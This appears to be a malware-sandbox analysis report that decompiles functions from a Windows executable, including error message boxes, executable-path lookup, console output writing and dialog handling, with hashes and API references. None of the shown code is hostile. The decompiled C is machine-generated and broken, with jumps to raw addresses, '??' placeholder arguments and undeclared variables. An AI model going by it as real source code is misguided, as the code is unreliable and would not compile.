Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 7d592ac69212e988a1052134f2f1a45de81130431c633717d475d5b1a3e6a8fe
Instruction ID: 6d0b9d1679c9eef083db72db7e68e5240d3715a5b69081efcb1fad2ef9e424ea
Opcode Fuzzy Hash: 7d592ac69212e988a1052134f2f1a45de81130431c633717d475d5b1a3e6a8fe
Instruction Fuzzy Hash: 46615D33A09B458AFB119F65D4803ADB7A0FB44B88F884266EF4D17B96DB3CE165C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D24D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00007FF77FF7DA8D24D0(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, char _a6232) {
				void* __rbx;
				void* __rsi;
				void* _t22;
				void* _t38;
				void* _t39;
				signed long long _t44;
				signed long long _t45;
				void* _t64;
				void* _t74;
				void* _t75;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t22 = E00007FF77FF7DA8DAD20(0x1840, __rax, _t74, _t75);
				_t65 = _t64 - __rax;
				_t44 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t45 = _t44 ^ _t64 - __rax;
				_a6168 = _t45;
				_t46 = __rdx;
				E00007FF77FF7DA8D1040(_t22);
				_a16 =  &_a6232;
				_a8 = 0;
				r8d = 0x400;
				E00007FF77FF7DA8E3B34(_t38, _t39,  *_t45 | 0x00000002,  &_a1048, __r8, __rdx);
				E00007FF77FF7DA8E4394(_t45);
				E00007FF77FF7DA8E43B4( *_t45, _t45, __rdx,  &_a6232);
				_a16 = _t45;
				_a8 = __rcx;
				E00007FF77FF7DA8D1B30(_t45,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t45, _t46,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
				if (_t45 == 0) goto 0xda8d25df;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t45, _t46,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d25f9;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t65);
			}

0x7ff7da8d24d0
0x7ff7da8d24d5
0x7ff7da8d24da
0x7ff7da8d24e7
0x7ff7da8d24ec
0x7ff7da8d24ef
0x7ff7da8d24f6
0x7ff7da8d24f9
0x7ff7da8d2501
0x7ff7da8d250f
0x7ff7da8d2514
0x7ff7da8d2524
0x7ff7da8d252d
0x7ff7da8d253a
0x7ff7da8d253f
0x7ff7da8d2546
0x7ff7da8d254b
0x7ff7da8d255f
0x7ff7da8d256e
0x7ff7da8d257d
0x7ff7da8d2583
0x7ff7da8d2588
0x7ff7da8d259b
0x7ff7da8d25a3
0x7ff7da8d25a5
0x7ff7da8d25ba
0x7ff7da8d25bf
0x7ff7da8d25d7
0x7ff7da8d25dd
0x7ff7da8d25df
0x7ff7da8d2613

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D25D7
MessageBoxA.USER32 ref: 00007FF7DA8D25F3

Strings

%s%s: %s, xrefs: 00007FF7DA8D2558
Fatal error detected, xrefs: 00007FF7DA8D25AB, 00007FF7DA8D25E5

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: 2ca8b161c2e9c3bcdb1472a4893fefc60b501485010ef6ee025377ec5ef74353
Instruction ID: 270727b3e0b3ab2777241ecc34e6a5c4bb8d6afb301644a0a6c5a4fe7a15981b
Opcode Fuzzy Hash: 2ca8b161c2e9c3bcdb1472a4893fefc60b501485010ef6ee025377ec5ef74353
Instruction Fuzzy Hash: 48318C72628A8281FA21BB10E4517EEE364FF94784FC44076EE8D07A9ADF3CD615CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D3B80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00007FF77FF7DA8D3B80(void* __rax, long long __rcx, char _a24, signed int _a8216) {
				void* __rbx;
				intOrPtr _t16;
				signed long long _t21;
				signed long long _t22;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				E00007FF77FF7DA8DAD20(0x2030, __rax, _t40, _t41);
				_t36 = _t35 - __rax;
				_t21 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t22 = _t21 ^ _t35 - __rax;
				_a8216 = _t22;
				r8d = 0x1000;
				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0xda8d3bd2;
				E00007FF77FF7DA8D2620(GetModuleFileNameW(??, ??, ??), _t22, "GetModuleFileNameW", "Failed to get executable path.\n", _t38, _t39);
				goto 0xda8d3bff;
				r8d = 0x1000;
				E00007FF77FF7DA8D7AB0(_t16, __rcx, __rcx,  &_a24, _t33, _t34, _t38);
				if (_t22 != 0) goto 0xda8d3bfa;
				E00007FF77FF7DA8D2770(_t22, "Failed to convert executable path to UTF-8.\n",  &_a24, _t38, _t39);
				goto 0xda8d3bff;
				return E00007FF77FF7DA8DACF0(1, 0, _a8216 ^ _t36);
			}

0x7ff7da8d3b87
0x7ff7da8d3b8c
0x7ff7da8d3b8f
0x7ff7da8d3b96
0x7ff7da8d3b99
0x7ff7da8d3bab
0x7ff7da8d3bb9
0x7ff7da8d3bc9
0x7ff7da8d3bd0
0x7ff7da8d3bd2
0x7ff7da8d3be0
0x7ff7da8d3be8
0x7ff7da8d3bf1
0x7ff7da8d3bf8
0x7ff7da8d3c17

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D3BB1

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF7DA8D3BEA
Failed to get executable path., xrefs: 00007FF7DA8D3BBB
GetModuleFileNameW, xrefs: 00007FF7DA8D3BC2

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 04e6919d6207e873115f5cfbaabaf22d19ebcbc8c50bb68e17d57e50300a9c4c
Instruction ID: d4587f5cf85cfe86ec07f74debcbb7f69452307fefef563fc9da97b3946a1904
Opcode Fuzzy Hash: 04e6919d6207e873115f5cfbaabaf22d19ebcbc8c50bb68e17d57e50300a9c4c
Instruction Fuzzy Hash: 52017121B1964388FE62B720E8063BDD351BF987C4FC814B3DC4E86297EE5DE1658720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EB9C0 Relevance: 6.3, APIs: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF7DA8EB9C0(void* __eax, signed int __edx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t184;
				signed int _t188;
				signed int _t195;
				signed int _t200;
				intOrPtr _t209;
				void* _t211;
				signed char _t212;
				void* _t229;
				void* _t262;
				signed long long _t263;
				long long _t268;
				long long _t270;
				void* _t271;
				long long _t273;
				intOrPtr* _t279;
				intOrPtr* _t286;
				long long _t288;
				long long _t315;
				void* _t323;
				long long _t324;
				void* _t325;
				long long _t326;
				intOrPtr* _t327;
				long long _t328;
				signed char* _t329;
				signed char* _t330;
				signed char* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				signed long long _t335;
				intOrPtr _t338;
				intOrPtr _t341;
				void* _t343;
				signed long long _t345;
				signed long long _t347;
				long long _t356;
				void* _t360;
				long long _t361;
				signed long long _t364;
				char _t365;
				signed long long _t366;
				void* _t369;
				signed char* _t370;
				signed long long _t372;

				_t262 = _t334;
				_t333 = _t262 - 0x57;
				_t335 = _t334 - 0xd0;
				 *((long long*)(_t333 - 9)) = 0xfffffffe;
				 *((long long*)(_t262 + 8)) = __rbx;
				_t263 =  *0xda90d008; // 0xde4e6c2f3c2e
				 *(_t333 + 0x17) = _t263 ^ _t335;
				_t327 = __r8;
				 *((long long*)(_t333 - 0x41)) = __r8;
				_t279 = __rcx;
				 *((long long*)(_t333 - 0x59)) =  *((intOrPtr*)(_t333 + 0x7f));
				_t364 = __edx >> 6;
				 *(_t333 - 0x39) = _t364;
				_t372 = __edx + __edx * 8;
				_t268 =  *((intOrPtr*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t364 * 8)) + 0x28 + _t372 * 8));
				 *((long long*)(_t333 - 0x19)) = _t268;
				r12d = r9d;
				_t361 = _t360 + __r8;
				 *((long long*)(_t333 - 0x61)) = _t361;
				 *((intOrPtr*)(_t333 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t333 - 0x59)) + 0x28)) != dil) goto 0xda8eba60;
				E00007FF77FF7DA8E3970(_t268, __rcx,  *((intOrPtr*)(_t333 - 0x59)), __r8);
				_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t333 - 0x45)) = _t209;
				 *_t279 = _t268;
				 *((intOrPtr*)(_t279 + 8)) = 0;
				if ( *((intOrPtr*)(_t333 - 0x41)) - _t361 >= 0) goto 0xda8ebe0b;
				_t345 = __edx >> 6;
				 *(_t333 - 0x11) = _t345;
				 *((char*)(_t333 - 0x71)) =  *_t327;
				 *((intOrPtr*)(_t333 - 0x6d)) = 0;
				r12d = 1;
				if (_t209 != 0xfde9) goto 0xda8ebc25;
				_t286 = 0x3e + _t372 * 8 +  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t345 * 8));
				if ( *_t286 == dil) goto 0xda8ebad2;
				_t369 = _t326 + 1;
				if (_t369 - 5 < 0) goto 0xda8ebabf;
				if (_t369 <= 0) goto 0xda8ebbbb;
				r12d =  *((char*)(_t286 + 0x7ff7da90d2d1));
				r12d = r12d + 1;
				_t184 = r12d - 1;
				 *((intOrPtr*)(_t333 - 0x51)) = _t184;
				_t338 = _t184;
				if (_t338 -  *((intOrPtr*)(_t333 - 0x61)) - _t327 > 0) goto 0xda8ebd88;
				_t288 = _t326;
				 *((char*)(_t333 + _t288 - 1)) =  *((intOrPtr*)(0x3e + _t372 * 8 +  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t345 * 8))));
				if (_t288 + 1 - _t369 < 0) goto 0xda8ebb23;
				if (_t338 <= 0) goto 0xda8ebb53;
				E00007FF77FF7DA8DBAC0();
				_t356 =  *((intOrPtr*)(_t333 - 0x59));
				_t315 = _t326;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t364 * 8)) + _t315 + 0x3e + _t372 * 8)) = dil;
				if (_t315 + 1 - _t369 < 0) goto 0xda8ebb56;
				 *((long long*)(_t333 - 0x31)) = _t326;
				_t270 = _t333 - 1;
				 *((long long*)(_t333 - 0x29)) = _t270;
				_t188 = (0 | r12d == 0x00000004) + 1;
				r12d = _t188;
				r8d = _t188;
				 *((long long*)(_t335 + 0x20)) = _t356;
				E00007FF77FF7DA8EF4CC(_t270, _t279, _t333 - 0x6d, _t333 - 0x29, _t338, _t333 - 0x31);
				if (_t270 == 0xffffffff) goto 0xda8ebe0b;
				_t328 = _t327 +  *((intOrPtr*)(_t333 - 0x51)) - 1;
				goto 0xda8ebcb6;
				_t365 =  *((char*)(_t270 + 0x7ff7da90d2d0));
				_t211 = _t365 + 1;
				_t271 = _t211;
				if (_t271 -  *((intOrPtr*)(_t333 - 0x61)) - _t328 > 0) goto 0xda8ebdb6;
				 *((long long*)(_t333 - 0x51)) = _t326;
				 *((long long*)(_t333 - 0x21)) = _t328;
				_t195 = (0 | _t211 == 0x00000004) + 1;
				r14d = _t195;
				r8d = _t195;
				 *((long long*)(_t335 + 0x20)) = _t356;
				_t347 = _t333 - 0x51;
				E00007FF77FF7DA8EF4CC(_t271, _t279, _t333 - 0x6d, _t333 - 0x21,  *((intOrPtr*)(_t333 - 0x61)) - _t328, _t347);
				if (_t271 == 0xffffffff) goto 0xda8ebe0b;
				_t329 = _t328 + _t365;
				r12d = r14d;
				_t366 =  *(_t333 - 0x39);
				goto 0xda8ebcb6;
				_t341 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8));
				_t212 =  *(_t341 + 0x3d + _t372 * 8);
				if ((_t212 & 0x00000004) == 0) goto 0xda8ebc58;
				 *((char*)(_t333 + 7)) =  *((intOrPtr*)(_t341 + 0x3e + _t372 * 8));
				 *((char*)(_t333 + 8)) =  *_t329;
				 *(_t341 + 0x3d + _t372 * 8) = _t212 & 0x000000fb;
				r8d = 2;
				goto 0xda8ebca1;
				r9d =  *_t329 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t356 + 0x18)))) + _t347 * 2)) >= 0) goto 0xda8ebc9b;
				_t370 =  &(_t329[1]);
				if (_t370 -  *((intOrPtr*)(_t333 - 0x61)) >= 0) goto 0xda8ebde8;
				r8d = 2;
				if (E00007FF77FF7DA8EDB00(_t212 & 0x000000fb, _t229, _t279, _t333 - 0x6d, _t329, _t326, _t329, _t333, _t341, _t356) == 0xffffffff) goto 0xda8ebe0b;
				_t330 = _t370;
				goto 0xda8ebcb6;
				_t200 = E00007FF77FF7DA8EDB00(_t212 & 0x000000fb, _t229, _t279, _t333 - 0x6d, _t330, _t326, _t330, _t333, _t361, _t356);
				if (_t200 == 0xffffffff) goto 0xda8ebe0b;
				_t331 =  &(_t330[1]);
				 *((long long*)(_t335 + 0x38)) = _t326;
				 *((long long*)(_t335 + 0x30)) = _t326;
				 *((intOrPtr*)(_t335 + 0x28)) = 5;
				_t273 = _t333 + 0xf;
				 *((long long*)(_t335 + 0x20)) = _t273;
				r9d = r12d;
				_t343 = _t333 - 0x6d;
				E00007FF77FF7DA8EF008();
				r14d = _t200;
				if (_t200 == 0) goto 0xda8ebe0b;
				 *((long long*)(_t335 + 0x20)) = _t326;
				r8d = _t200;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xda8ebe03;
				 *((intOrPtr*)(_t279 + 4)) = __esi -  *((intOrPtr*)(_t333 - 0x41)) +  *((intOrPtr*)(_t279 + 8));
				if ( *((intOrPtr*)(_t333 - 0x69)) - r14d < 0) goto 0xda8ebe0b;
				if ( *((char*)(_t333 - 0x71)) != 0xa) goto 0xda8ebd6e;
				 *((short*)(_t333 - 0x71)) = 0xd;
				 *((long long*)(_t335 + 0x20)) = _t326;
				_t130 = _t273 - 0xc; // 0x1
				r8d = _t130;
				_t323 = _t333 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xda8ebe03;
				if ( *((intOrPtr*)(_t333 - 0x69)) - 1 < 0) goto 0xda8ebe0b;
				 *((intOrPtr*)(_t279 + 8)) =  *((intOrPtr*)(_t279 + 8)) + 1;
				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) + 1;
				if (_t331 -  *((intOrPtr*)(_t333 - 0x61)) >= 0) goto 0xda8ebe0b;
				goto 0xda8eba89;
				if (_t323 <= 0) goto 0xda8ebdb1;
				_t332 = _t331 - _t370;
				 *((char*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8)) + _t370 + 0x3e + _t372 * 8)) =  *((intOrPtr*)(_t332 + _t370));
				if (1 - _t323 < 0) goto 0xda8ebd90;
				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) +  *((intOrPtr*)(_t279 + 4));
				goto 0xda8ebe0b;
				if (_t343 <= 0) goto 0xda8ebde2;
				_t324 = _t326;
				 *((char*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 +  *(_t333 - 0x39) * 8)) + _t324 + 0x3e + _t372 * 8)) =  *((intOrPtr*)(_t324 + _t332));
				_t325 = _t324 + 1;
				if (2 - _t343 < 0) goto 0xda8ebdc2;
				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) + r8d;
				goto 0xda8ebe0b;
				 *((intOrPtr*)(_t343 + 0x3e + _t372 * 8)) = r9b;
				 *( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8)) + 0x3d + _t372 * 8) =  *( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8)) + 0x3d + _t372 * 8) | 0x00000004;
				_t173 = _t325 + 1; // 0x1
				 *((intOrPtr*)(_t279 + 4)) = _t173;
				goto 0xda8ebe0b;
				 *_t279 = GetLastError();
				return E00007FF77FF7DA8DACF0(_t207,  *((intOrPtr*)(_t333 - 0x45)),  *(_t333 + 0x17) ^ _t335);
			}

0x7ff7da8eb9c0
0x7ff7da8eb9ce
0x7ff7da8eb9d2
0x7ff7da8eb9d9
0x7ff7da8eb9e1
0x7ff7da8eb9e5
0x7ff7da8eb9ef
0x7ff7da8eb9f3
0x7ff7da8eb9f6
0x7ff7da8eb9fd
0x7ff7da8eba04
0x7ff7da8eba0e
0x7ff7da8eba12
0x7ff7da8eba20
0x7ff7da8eba2c
0x7ff7da8eba31
0x7ff7da8eba35
0x7ff7da8eba38
0x7ff7da8eba3b
0x7ff7da8eba45
0x7ff7da8eba52
0x7ff7da8eba57
0x7ff7da8eba64
0x7ff7da8eba67
0x7ff7da8eba6c
0x7ff7da8eba6f
0x7ff7da8eba76
0x7ff7da8eba7f
0x7ff7da8eba83
0x7ff7da8eba8b
0x7ff7da8eba8e
0x7ff7da8eba91
0x7ff7da8ebaa4
0x7ff7da8ebab7
0x7ff7da8ebac2
0x7ff7da8ebac6
0x7ff7da8ebad0
0x7ff7da8ebad5
0x7ff7da8ebae9
0x7ff7da8ebaf2
0x7ff7da8ebaf8
0x7ff7da8ebafa
0x7ff7da8ebb04
0x7ff7da8ebb0a
0x7ff7da8ebb10
0x7ff7da8ebb25
0x7ff7da8ebb32
0x7ff7da8ebb37
0x7ff7da8ebb43
0x7ff7da8ebb48
0x7ff7da8ebb53
0x7ff7da8ebb61
0x7ff7da8ebb6c
0x7ff7da8ebb6e
0x7ff7da8ebb72
0x7ff7da8ebb76
0x7ff7da8ebb83
0x7ff7da8ebb85
0x7ff7da8ebb88
0x7ff7da8ebb8b
0x7ff7da8ebb9c
0x7ff7da8ebba5
0x7ff7da8ebbb3
0x7ff7da8ebbb6
0x7ff7da8ebbbe
0x7ff7da8ebbc7
0x7ff7da8ebbd2
0x7ff7da8ebbd8
0x7ff7da8ebbde
0x7ff7da8ebbe2
0x7ff7da8ebbee
0x7ff7da8ebbf0
0x7ff7da8ebbf3
0x7ff7da8ebbf6
0x7ff7da8ebbfb
0x7ff7da8ebc07
0x7ff7da8ebc10
0x7ff7da8ebc16
0x7ff7da8ebc19
0x7ff7da8ebc1c
0x7ff7da8ebc20
0x7ff7da8ebc25
0x7ff7da8ebc2d
0x7ff7da8ebc35
0x7ff7da8ebc3c
0x7ff7da8ebc41
0x7ff7da8ebc47
0x7ff7da8ebc4c
0x7ff7da8ebc56
0x7ff7da8ebc58
0x7ff7da8ebc68
0x7ff7da8ebc6a
0x7ff7da8ebc72
0x7ff7da8ebc7b
0x7ff7da8ebc90
0x7ff7da8ebc96
0x7ff7da8ebc99
0x7ff7da8ebca8
0x7ff7da8ebcb0
0x7ff7da8ebcb6
0x7ff7da8ebcb9
0x7ff7da8ebcbe
0x7ff7da8ebcc3
0x7ff7da8ebccb
0x7ff7da8ebccf
0x7ff7da8ebcd4
0x7ff7da8ebcd7
0x7ff7da8ebce0
0x7ff7da8ebce5
0x7ff7da8ebcea
0x7ff7da8ebcf0
0x7ff7da8ebcf9
0x7ff7da8ebd0f
0x7ff7da8ebd1d
0x7ff7da8ebd24
0x7ff7da8ebd2e
0x7ff7da8ebd35
0x7ff7da8ebd39
0x7ff7da8ebd42
0x7ff7da8ebd42
0x7ff7da8ebd46
0x7ff7da8ebd55
0x7ff7da8ebd5f
0x7ff7da8ebd65
0x7ff7da8ebd68
0x7ff7da8ebd72
0x7ff7da8ebd83
0x7ff7da8ebd8b
0x7ff7da8ebd8d
0x7ff7da8ebd9f
0x7ff7da8ebdaf
0x7ff7da8ebdb1
0x7ff7da8ebdb4
0x7ff7da8ebdb9
0x7ff7da8ebdbb
0x7ff7da8ebdd0
0x7ff7da8ebdd7
0x7ff7da8ebde0
0x7ff7da8ebde2
0x7ff7da8ebde6
0x7ff7da8ebde8
0x7ff7da8ebdf5
0x7ff7da8ebdfb
0x7ff7da8ebdfe
0x7ff7da8ebe01
0x7ff7da8ebe09
0x7ff7da8ebe34

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7DA8EBA3F
WriteFile.KERNEL32 ref: 00007FF7DA8EBD07
WriteFile.KERNEL32 ref: 00007FF7DA8EBD4D
GetLastError.KERNEL32 ref: 00007FF7DA8EBE03

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 4cae027592c5ba934747693b00d7aff08725dc1ee470aad96940ecba80e61e26
Instruction ID: 3015a7e8fc187f18b525ac0f8d476e40feaf1f2652b40fe8f83079da93e8bb0b
Opcode Fuzzy Hash: 4cae027592c5ba934747693b00d7aff08725dc1ee470aad96940ecba80e61e26
Instruction Fuzzy Hash: C2D11132B08A8189F712DF64C4442ACB7B1FB64798B848176CE4E97B8ADE3DD526C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7DA8D1FA4
SetWindowLongPtrW.USER32 ref: 00007FF7DA8D1FC6
GetWindowLongPtrW.USER32 ref: 00007FF7DA8D1FF0
InvalidateRect.USER32 ref: 00007FF7DA8D2010

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
Instruction ID: cce63523b37562e1ed21a6ef47c86d7ad9f81d523b7969d044a97034b57c0e1a
Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
Instruction Fuzzy Hash: 6511C621E1814346FA56A76AE5442BDD292FFD9791FC88072ED4906BCBDE2CD4A18310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F4C8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8F4C8C(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __r8, void* __r9, void* __r10, long long _a8, long long _a16) {
				char _v16;
				intOrPtr _v32;
				char _v40;
				signed long long _v48;
				signed long long _v56;
				intOrPtr _v64;
				long long _v72;
				void* _t28;
				void* _t29;
				long long _t57;

				_t29 = __ebx;
				_a8 = __rbx;
				_a16 = __rsi;
				_t57 = __r8;
				if (E00007FF77FF7DA8F07F0(__rax, __r9, __rdx, __rdx, __r8, __rcx, __r9) != 0) goto 0xda8f4d59;
				E00007FF77FF7DA8E496C(__rax, __r9,  &_v40, __rdx, __r8);
				if ( *((intOrPtr*)(_v32 + 0xc)) != 0xfde9) goto 0xda8f4cec;
				if (_v16 == 0) goto 0xda8f4d23;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				goto 0xda8f4d23;
				_t28 = E00007FF77FF7DA8EDF1C(_v16, _v40);
				if (_t28 != 0) goto 0xda8f4d0e;
				if (_v16 == _t28) goto 0xda8f4d07;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				goto 0xda8f4d23;
				if (_v16 == 0) goto 0xda8f4d21;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				_v48 = _v48 & 0x00000000;
				r9d = _t29;
				_v56 = _v56 & 0x00000000;
				_v64 = 0x3f;
				_v72 = _t57;
				E00007FF77FF7DA8EF008();
				return _t28;
			}

0x7ff7da8f4c8c
0x7ff7da8f4c8c
0x7ff7da8f4c91
0x7ff7da8f4c9e
0x7ff7da8f4cb8
0x7ff7da8f4cc3
0x7ff7da8f4cd5
0x7ff7da8f4cdc
0x7ff7da8f4ce3
0x7ff7da8f4cea
0x7ff7da8f4cec
0x7ff7da8f4cf3
0x7ff7da8f4cf9
0x7ff7da8f4d00
0x7ff7da8f4d0c
0x7ff7da8f4d13
0x7ff7da8f4d1a
0x7ff7da8f4d23
0x7ff7da8f4d29
0x7ff7da8f4d2c
0x7ff7da8f4d35
0x7ff7da8f4d3f
0x7ff7da8f4d44
0x7ff7da8f4d58

APIs

Part of subcall function 00007FF7DA8F07F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F0823

_get_daylight.LIBCMT ref: 00007FF7DA8F4DA4
_get_daylight.LIBCMT ref: 00007FF7DA8F4DB5

Strings

?, xrefs: 00007FF7DA8F4D35

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
